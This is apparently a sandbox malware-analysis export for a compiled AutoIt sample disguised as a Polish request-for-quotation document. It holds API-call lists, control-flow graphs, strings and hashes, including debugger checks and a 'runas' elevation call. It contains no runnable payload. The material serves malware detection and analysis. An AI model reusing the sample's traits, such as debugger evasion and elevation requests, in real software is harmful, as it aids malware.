86997->86998 86999 40c740 75 API calls 86997->86999 87000 40e4ce 86999->87000 87000->86975 87001 40ee70 87000->87001 87002 40e551 87001->87002 87003 40ee76 LoadLibraryA 87001->87003 87002->86979 87002->86980 87003->87002 87004 40ee87 GetProcAddress 87003->87004 87004->87002 87006 40e5bf 87005->87006 87007 40eee6 LoadLibraryA 87005->87007 87006->86978 87006->86985 87007->87006 87008 40eef7 GetProcAddress 87007->87008 87008->87006 87013 40eec0 LoadLibraryA GetProcAddress 87009->87013 87011 40e5d3 GetNativeSystemInfo 87011->86988 87011->86989 87012->86980 87013->87011 87014 42e89e 87021 40c000 87014->87021 87016 42e8ac 87017 409a40 165 API calls 87016->87017 87018 42e8ca 87017->87018 87032 44b92e VariantClear 87018->87032 87020 42f3ae 87022 40c014 87021->87022 87023 40c007 87021->87023 87025 40c01a 87022->87025 87026 40c02c 87022->87026 87033 409210 VariantClear 87023->87033 87034 409210 VariantClear 87025->87034 87028 41171a 75 API calls 87026->87028 87031 40c033 87028->87031 87029 40c00f 87029->87016 87030 40c023 87030->87016 87031->87016 87032->87020 87033->87029 87034->87030
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00409A61
                                                                                                                                                                                                                                                        • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                        • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                                                                                                                                        • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                                                                                                                                        • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                      • String ID: 0vH$4RH
                                                                                                                                                                                                                                                      • API String ID: 1143807570-2085553193
                                                                                                                                                                                                                                                      • Opcode ID: 120bca6dcf3c52d3ec5f5cdcaf5c0e5942533e89ae79908e4fce472de5cfbc8e
                                                                                                                                                                                                                                                      • Instruction ID: 7c8f52bff4b3ea9a641e6aac08ab5e1c8beb32691f0f21fab5f23224d73a3634
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 120bca6dcf3c52d3ec5f5cdcaf5c0e5942533e89ae79908e4fce472de5cfbc8e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34238170A043109FD724DF25D480A6BB7E1BF89304F54896EE84A9B391D739EC46CB9B

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000104,?,00000001,?,00000000), ref: 0040D6E5
                                                                                                                                                                                                                                                        • Part of subcall function 00401F80: GetModuleFileNameW.KERNEL32(00000000,004A7D14,00000104,?,?,?,?,00000000), ref: 00401FAD
                                                                                                                                                                                                                                                        • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 00402078
                                                                                                                                                                                                                                                        • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 0040208E
                                                                                                                                                                                                                                                        • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020A4
                                                                                                                                                                                                                                                        • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020BA
                                                                                                                                                                                                                                                        • Part of subcall function 00401F80: _wcscpy.LIBCMT ref: 004020EF
                                                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?), ref: 0040D6F1
                                                                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(004A7D14,00000104,?,004A7CF8,004A7CFC), ref: 0040D763
                                                                                                                                                                                                                                                        • Part of subcall function 00401440: GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 00401483
                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,00000001,004A7D14,00000004), ref: 0040D7D6
                                                                                                                                                                                                                                                      • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,004846D6,00000010), ref: 00431AAB
                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,004A7D14,00000004), ref: 00431B0E
                                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104,004A7D14,00000004), ref: 00431B3F
                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 00431B8B
                                                                                                                                                                                                                                                      • ShellExecuteW.SHELL32(00000000), ref: 00431B92
                                                                                                                                                                                                                                                        • Part of subcall function 004101F0: GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                                                                                                                                                                                                                        • Part of subcall function 004101F0: LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                                                                                                                                                                                                                                        • Part of subcall function 004101F0: LoadIconW.USER32(?,00000063), ref: 0041021F
                                                                                                                                                                                                                                                        • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A4), ref: 00410232
                                                                                                                                                                                                                                                        • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A2), ref: 00410245
                                                                                                                                                                                                                                                        • Part of subcall function 004101F0: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                                                                                                                                                                                                                        • Part of subcall function 004101F0: RegisterClassExW.USER32 ref: 004102C6
                                                                                                                                                                                                                                                        • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                                                                                                                                                                                                                        • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                                                                                                                                                                                                                        • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 00410454
                                                                                                                                                                                                                                                        • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                                                                                                                                                                                                        • Part of subcall function 0040E1E0: _memset.LIBCMT ref: 0040E202
                                                                                                                                                                                                                                                        • Part of subcall function 0040E1E0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memset_wcscpy
                                                                                                                                                                                                                                                      • String ID: @GH$@GH$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                                                                                                                                                      • API String ID: 2493088469-3798371973
                                                                                                                                                                                                                                                      • Opcode ID: 1a0ed8742bd98226e3ba0f055742ccaca08136dd93b2b863f89549b94dfb798c
                                                                                                                                                                                                                                                      • Instruction ID: f6e0ab4c143dd9a1f797559286fb6c41f0380d60009eb7dc722615656bf0e84e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a0ed8742bd98226e3ba0f055742ccaca08136dd93b2b863f89549b94dfb798c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0341F731618341ABD320F7A19C49BAF3BA4AB96704F04493FF941672D1DBBC9949C72E

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 1333 47a999-47aa00 call 40c060 * 3 call 4092c0 1342 47aa02-47aa09 OleInitialize 1333->1342 1343 47aa10-47aa3a call 40fff0 CLSIDFromProgID call 4137d3 1333->1343 1342->1343 1348 47aa3c-47aa47 1343->1348 1349 47aa79-47aa8f 1343->1349 1352 47aa48-47aa76 call 4781ae call 402620 * 3 1348->1352 1350 47aa95-47aab4 CoCreateInstance 1349->1350 1351 47ab2c-47ab59 call 4580e1 1349->1351 1350->1348 1353 47aab6-47aad9 1350->1353 1351->1348 1360 47ab5f-47ab9b CoInitializeSecurity call 4131f0 call 4342a8 1351->1360 1364 47aadc-47aade 1353->1364 1372 47acb7 1360->1372 1373 47aba1-47abc7 call 4021e0 call 434b96 1360->1373 1364->1348 1367 47aae4-47ab29 call 467626 call 402620 * 3 1364->1367 1377 47acbe-47ad10 call 4131f0 CoCreateInstanceEx 1372->1377 1388 47abe3-47abf1 call 4646f6 1373->1388 1389 47abc9-47abe1 1373->1389 1377->1348 1386 47ad16-47ad1c 1377->1386 1386->1348 1390 47ad22-47ad29 1386->1390 1400 47abf6-47ac54 call 40df50 call 402620 call 460976 call 40df50 call 402620 1388->1400 1392 47ac58-47ac61 1389->1392 1394 47ad5b-47ad75 1390->1394 1395 47ad2b-47ad59 CoSetProxyBlanket 1390->1395 1397 47ac76-47ac7a 1392->1397 1398 47ac63-47ac74 call 4112d5 1392->1398 1394->1364 1396 47ad7b-47ad8d 1394->1396 1395->1394 1396->1352 1403 47ac7e-47acb5 1397->1403 1398->1403 1400->1392 1403->1377
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 0047AA03
                                                                                                                                                                                                                                                      • CLSIDFromProgID.COMBASE(00000000,?), ref: 0047AA27
                                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,004829C0,?), ref: 0047AAAA
                                                                                                                                                                                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0047AB6B
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0047AB7C
                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 0047AC68
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0047ACCD
                                                                                                                                                                                                                                                      • CoCreateInstanceEx.OLE32 ref: 0047AD06
                                                                                                                                                                                                                                                      • CoSetProxyBlanket.OLE32(004829D0,?,?,?,?,?,?,00000800), ref: 0047AD53
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • NULL Pointer assignment, xrefs: 0047AD84
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CreateInitializeInstance_memset$BlanketFromProgProxySecurity_wcslen
                                                                                                                                                                                                                                                      • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                                      • API String ID: 1588287285-2785691316
                                                                                                                                                                                                                                                      • Opcode ID: 850ce0bb28aece6e0e7f2ac54e89f2f6fcadfe9aaf272da4708e4c1afc89c03f
                                                                                                                                                                                                                                                      • Instruction ID: 16786b45dbc5194aa398acfc0f0ff3b91b98a178c64a073a91da7f4e0cb75f58
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 850ce0bb28aece6e0e7f2ac54e89f2f6fcadfe9aaf272da4708e4c1afc89c03f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 54B10DB15083409FD320EF65C881B9FB7E8BBC8744F108E2EF58997291D7759948CB66

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 1422 40e470-40e500 call 40c060 GetVersionExW call 4021e0 call 40e600 call 40e620 1431 40e506-40e509 1422->1431 1432 42accc-42acd1 1422->1432 1435 40e540-40e555 call 40ee70 1431->1435 1436 40e50b-40e51c 1431->1436 1433 42acd3-42acdb 1432->1433 1434 42acdd-42ace0 1432->1434 1438 42ad12-42ad20 1433->1438 1439 42ace2-42aceb 1434->1439 1440 42aced-42acf0 1434->1440 1453 40e557-40e573 GetCurrentProcess call 40ee30 1435->1453 1454 40e579-40e5a8 1435->1454 1441 40e522-40e525 1436->1441 1442 42ac9b-42aca7 1436->1442 1452 42ad28-42ad2d GetSystemInfo 1438->1452 1439->1438 1440->1438 1447 42acf2-42ad06 1440->1447 1441->1435 1443 40e527-40e537 1441->1443 1445 42acb2-42acba 1442->1445 1446 42aca9-42acad 1442->1446 1450 42acbf-42acc7 1443->1450 1451 40e53d 1443->1451 1445->1435 1446->1435 1448 42ad08-42ad0c 1447->1448 1449 42ad0e 1447->1449 1448->1438 1449->1438 1450->1435 1451->1435 1456 42ad38-42ad3d GetSystemInfo 1452->1456 1453->1454 1464 40e575 1453->1464 1454->1456 1457 40e5ae-40e5c3 call 40eee0 1454->1457 1457->1452 1462 40e5c9-40e5db call 40eea0 GetNativeSystemInfo 1457->1462 1466 40e5e0-40e5ef 1462->1466 1467 40e5dd-40e5de FreeLibrary 1462->1467 1464->1454 1468 40e5f1-40e5f2 FreeLibrary 1466->1468 1469 40e5f4-40e5ff 1466->1469 1467->1466 1468->1469
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetVersionExW.KERNEL32 ref: 0040E495
                                                                                                                                                                                                                                                        • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,?), ref: 0040E560
                                                                                                                                                                                                                                                      • GetNativeSystemInfo.KERNELBASE(?,?), ref: 0040E5D3
                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 0040E5DE
                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 0040E5F2
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_wcslen
                                                                                                                                                                                                                                                      • String ID: pMH
                                                                                                                                                                                                                                                      • API String ID: 2923339712-2522892712
                                                                                                                                                                                                                                                      • Opcode ID: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                                                                                                                                                                                                      • Instruction ID: 31d199e0849a18b4fe3a20375a839c17b1fda7a8e5a404adfed2e153d323e8b3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D4612E71508792AEC311CB69C44425ABFE07B6A308F580E6EE48483A42D379E568C7AB
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EB55,0040D86E), ref: 0040EB7B
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EB8D
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                      • String ID: IsThemeActive$uxtheme.dll
                                                                                                                                                                                                                                                      • API String ID: 2574300362-3542929980
                                                                                                                                                                                                                                                      • Opcode ID: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                                                                                                                                                                                                      • Instruction ID: e8120cabfd18d8fe06d2f96d8b82b2b5a4bcadd10797c678d2963416b1e4c3b8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 05D0C9B49407039AD7306F72C918B0A7BE4AB50342F204C3EF996A1694DBBCD0508B28

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410C44
                                                                                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 00410C61
                                                                                                                                                                                                                                                        • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                                                                                                                                                      • _wcsncat.LIBCMT ref: 00410C78
                                                                                                                                                                                                                                                      • __wmakepath.LIBCMT ref: 00410C94
                                                                                                                                                                                                                                                        • Part of subcall function 00413E3C: __wmakepath_s.LIBCMT ref: 00413E52
                                                                                                                                                                                                                                                        • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                                                                                                                                        • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                                                                                                                                        • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 00410CCC
                                                                                                                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00020019,?), ref: 00410CE9
                                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32 ref: 00429BE4
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00429C43
                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00429C55
                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00429C66
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00429C80
                                                                                                                                                                                                                                                      • _wcsncpy.LIBCMT ref: 00429CC0
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00429CDE
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _wcscat_wcslen$CloseException@8FileModuleNameOpenQueryThrowValue__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpystd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\
                                                                                                                                                                                                                                                      • API String ID: 1004883554-2276155026
                                                                                                                                                                                                                                                      • Opcode ID: bd70d1de0bf944503d0c9583a27c2bfe501ff96b935e7e88766a5686d489513a
                                                                                                                                                                                                                                                      • Instruction ID: ef4714a7fd58501e566ba693257e1f196c1b97611c18bc9c35ab262cfa7686fb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd70d1de0bf944503d0c9583a27c2bfe501ff96b935e7e88766a5686d489513a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B961B3B1508340DFC300EF65EC8599BBBE8FB99704F44882EF544C3261EBB59948CB5A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00409A40: _wcslen.LIBCMT ref: 00409A61
                                                                                                                                                                                                                                                        • Part of subcall function 00409A40: CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 00409870
                                                                                                                                                                                                                                                      • timeGetTime.WINMM ref: 00409880
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: BuffCharSleepTimeUpper_wcslentime
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3219444185-0
                                                                                                                                                                                                                                                      • Opcode ID: c038d4071518633a740acc5a54e026e208573efa437d9a063aeeb7a09e84b998
                                                                                                                                                                                                                                                      • Instruction ID: 79dfb759edd1749a95aa3438e3198289cebfc990e9c1b7da565b255c5aac8c6d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c038d4071518633a740acc5a54e026e208573efa437d9a063aeeb7a09e84b998
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D422F171608342ABC724DF64C984BABB7A0BF89304F14492FE54997392D77CEC45CB9A

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 1206 479921-47995f 1207 479965-479969 1206->1207 1208 479c79-479c94 call 4781ae 1206->1208 1207->1208 1209 47996f-479975 1207->1209 1209->1208 1211 47997b-479983 call 43550e 1209->1211 1215 479985-4799a0 call 4781ae 1211->1215 1216 4799a3-4799ab 1211->1216 1218 4799ad-4799c8 call 4781ae 1216->1218 1219 4799cb-4799d6 call 4112d5 1216->1219 1225 479a32 1219->1225 1226 4799d8-479a08 call 40fff0 1219->1226 1227 479a36-479a5a call 410f64 1225->1227 1226->1227 1235 479a0a-479a2f call 4137d3 call 4781ae 1226->1235 1233 479ab2-479ac3 1227->1233 1234 479a5c-479a65 1227->1234 1236 479ad5-479b26 VariantInit call 4131f0 1233->1236 1237 479ac5-479ad1 1233->1237 1238 479a69-479a83 call 476a8a 1234->1238 1253 479b68-479b6a 1236->1253 1254 479b28-479b2b 1236->1254 1237->1236 1245 479a85-479a8d 1238->1245 1246 479a91-479aac call 4781ae 1238->1246 1245->1238 1248 479a8f 1245->1248 1246->1233 1257 479c28 1246->1257 1248->1233 1255 479bc5-479bd7 call 467626 1253->1255 1256 479b6c-479b71 1253->1256 1258 479ba1-479bc3 call 4781ae VariantClear 1254->1258 1259 479b2d-479b65 1254->1259 1270 479c19-479c26 VariantClear 1255->1270 1271 479bd9-479be2 1255->1271 1256->1258 1260 479b73-479b9c call 4781ae VariantClear 1256->1260 1263 479c2e-479c30 1257->1263 1258->1263 1259->1253 1260->1263 1267 479c32 1263->1267 1268 479c4d-479c60 call 4137d3 1263->1268 1272 479c36-479c3a 1267->1272 1278 479c62-479c68 call 4137d3 1268->1278 1279 479c6b-479c76 1268->1279 1270->1263 1274 479be6-479bf4 1271->1274 1275 479c42-479c4b VariantClear 1272->1275 1276 479c3c-479c40 VariantClear 1272->1276 1280 479bf6-479bfe call 4355fd 1274->1280 1281 479c0b 1274->1281 1275->1268 1275->1272 1276->1275 1278->1279 1288 479c11-479c17 1280->1288 1289 479c00-479c09 call 4355fd 1280->1289 1283 479c0c call 467626 1281->1283 1283->1288 1288->1270 1288->1274 1289->1283
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
